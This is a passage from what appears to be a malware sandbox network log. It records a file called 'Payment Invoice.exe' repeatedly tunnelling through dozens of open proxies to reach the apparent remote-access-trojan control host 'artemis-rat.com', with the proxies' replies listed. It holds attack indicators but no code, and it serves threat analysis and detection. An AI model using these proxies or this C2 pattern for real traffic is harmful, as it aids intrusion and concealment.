                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1696192.168.2.45511892.204.135.37165917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.517291069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.089612961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.886424065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.321834087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.123893023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.909533978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.757803917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:39.387300014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:50.589243889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1697192.168.2.455123200.115.188.5280807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.517838001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.755022049 CET243INHTTP/1.0 307 Temporary Redirect
                                                                Content-Length: 0
                                                                Content-Type: text/html
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Expires: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Server: Mikrotik HttpProxy
                                                                Proxy-Connection: close
                                                                Location: http://www.avis.com.hn


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1698192.168.2.454598136.54.39.3481187076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.519567013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.326900005 CET131INHTTP/1.1 503 Too many open connections
                                                                Content-Type: text/plain
                                                                Connection: close
                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                Data Ascii: Maximum number of open connections reached.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1699192.168.2.455068158.255.215.50169937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.520828009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.835751057 CET339INHTTP/1.1 403 Forbidden
                                                                Server: squid/4.7
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 5
                                                                X-Squid-Error: TCP_RESET 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
                                                                X-Cache: MISS from proxy.wakoopa.com
                                                                Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                Connection: keep-alive
                                                                Data Raw: 72 65 73 65 74
                                                                Data Ascii: reset


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1700192.168.2.455004117.160.250.13188997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.520844936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.029612064 CET303INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 154
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1701192.168.2.450981162.214.225.223361297076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.522178888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.589498043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.683370113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.777048111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:46.886125088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:10.886128902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:58.886143923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1702192.168.2.45312345.173.12.14119947076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.525427103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.670380116 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1703192.168.2.450724201.71.3.619997076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.556530952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.302711010 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1704192.168.2.45456845.171.242.380837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.556565046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.589401007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1705192.168.2.455120185.225.232.191807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.557538986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.870480061 CET805INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Server: Apache/2.4.57 (Debian)
                                                                Content-Length: 613
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1706192.168.2.455058121.204.179.7077777076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.557883024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.323956966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.511502028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183811903 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1707192.168.2.453098103.213.219.20031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.560489893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.589451075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.683372974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.777055979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1708192.168.2.45465167.43.227.227127237076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.560489893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.292548895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.480408907 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1709192.168.2.455017211.93.2.19073027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.562309027 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1710192.168.2.45453859.6.26.121807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.563741922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1711192.168.2.45071575.119.145.169613447076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.564033985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.714286089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1712192.168.2.454639203.253.142.17680807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.564227104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.689626932 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1713192.168.2.45071131.24.44.92521737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.568963051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.714332104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.714723110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.827927113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:46.839222908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:58.932959080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:11.120512962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:35.127193928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:23.214262009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1714192.168.2.453733174.77.111.19641457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.569421053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1715192.168.2.4546208.130.39.11733897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.578819036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.915432930 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1716192.168.2.453105200.81.127.11341537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.583014965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1717192.168.2.455107103.190.54.141807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.584691048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1718192.168.2.45513658.234.116.19781937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:22.588027954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
